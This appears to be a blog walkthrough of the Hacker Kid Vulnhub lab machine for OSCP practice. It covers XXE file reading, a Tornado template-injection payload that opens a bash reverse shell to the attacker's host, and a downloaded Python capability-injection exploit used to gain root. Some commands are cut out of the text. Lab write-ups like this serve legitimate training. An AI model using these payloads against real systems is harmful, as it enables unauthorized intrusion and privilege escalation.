This is the Hacker Kid Vulnhub walkthrough. Here’s what you will learn from this walkthrough. One thing you will learn is how to do binary analysis for Linux privilege escalation, but that is all I will give away. This is an excellent OSCP like box you can use to practice for the OSCP exam for free.
Table of Contents
What is an OSCP-like box?
An OSCP-like box is one you might see on the Offensive Security OSCP exam. It is one that is more realistic in its intended exploitation than other boxes that rely on less practical exploit methodologies such as steganography, cracking complex hash sequences, etc. In a nutshell, it means that the box is something you could expect to see in use in real life. You won’t find mind puzzles and abstract sudoku-like challenges in these boxes. Personally I find those to be annoying and prefer OSCP-like boxes in general.
Want to learn more ethical hacking? I highly recommend buying my book made for beginners to Pentesting Become An Ethical Hacker. Check the price on Amazon.
Here’s What You Need
- Hacker Kid VM from vulnhub
- Kali Linux VM from Offensive Security
Initial Enumeration
We kick off the initial enumeration stage with a simple nmap scan of the target using the command
It looks like ssh is open, but we will focus on the other open ports. There are two open web services on port 80 and port 8080. Let’s start with 80.
Web Enumeration
For the hackerkid web enumeration step you can use tools like ffuf, dirbuster, dirb, gobuster, and dirseach. Looking at the page source the main page we see there is a note TO DO: Use a GET parameter page_no to view pages. This could mean a vulnerable parameter we should fuzz or that there is another page to be seem with a certain id.
I find that for simple fuzzing of a page_no parameter the Burp Suite Sniper tool is perfect since we just need to supply numbers sequentially starting with 1 and incrementing by 1 each step.
We need to add this new subdomain to the /etc/hosts file. Then upon DIGging more information using the dig hackers.blackhat.local @hackeridIP command, we find another one to add hackerkid.blackhat.local. Let’s add that one too.
Hacker Kid Web Exploitation
At first glance the web server is sending back an XML response. This means possibly there is an XML related exploit available. By using the line file:///etc/passwd we can execute it on the server and get back the contents of that remote file.
Making a call for different files is not ending well for me, so I check the sahet user’s .bashrc file. Only that fails too. If the web is using PHP, instead of using file:/ you can use php wrappersphp://filter/convert.base64-encode/resource= to access internal files. Upon decoding this returned base64 string we get some credentials.
Get Your First Shell
The way to get a shell on the hackerkid machine is to exploit the web app’s XXE vulnerability. In a few words, the site is vulnerable to XXE (XML Entity Injection). The exploit is for the underlying web server, Tornado, see https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#tornado-python .
To do so the steps are:
- In the new URL after the new parameter /?name=?, put in payload {% import os %}{{os.system(‘bash -c “bash -i >& /dev/tcp/kaliIP/1234 0>&1″‘)}}
- Use burp to intercept the request and send to decoder then url-encode everything from after =
- Start a new netcat listener in Kali Linux.
- Paste in Burp repeater and run to get a new shell back to your listener.
Stabilize Your Shell
To upgrade the current shell we can run the installed Python and then use another command so that the annoying duplicating commands thing will stop.
/usr/bin/python2.7 -c "import pty;pty.spawn('/bin/bash')"
stty -echoVulnhub:Hackerkid Privilege Escalation
For the Linux privilege escalation part of the hackerkid box you can use any automated scanning tools such as LinEnum or Smart Linux Enumeration. Sooner or later you will find that the path to root is through the getcap command. There is a vulnerable capability in the installed Python version. To find the different capabilities of binaries installed in the box you can use the
The next few steps involve downloading the exploit, moving it to the target, finding a root process to supply it to the exploit, and executing it to become root.
wget hxxps://gist.github.com/wifisecguy/1d69839fe855c36a1dbecca66948ad56/raw/e919439010bbabed769d86303ff18ffbacdaecfd/inject.py -O funny.py
php -S 0.0.0.0::80
wget http://10.0.50.50/funny.py -O funny.py
ps -eaf | grep root
/usr/bin/python2.7 funny.py 571With that we are now root.
Want to learn more ethical hacking? I highly recommend buying my book made for beginners to Pentesting Become An Ethical Hacker. Check the price on Amazon.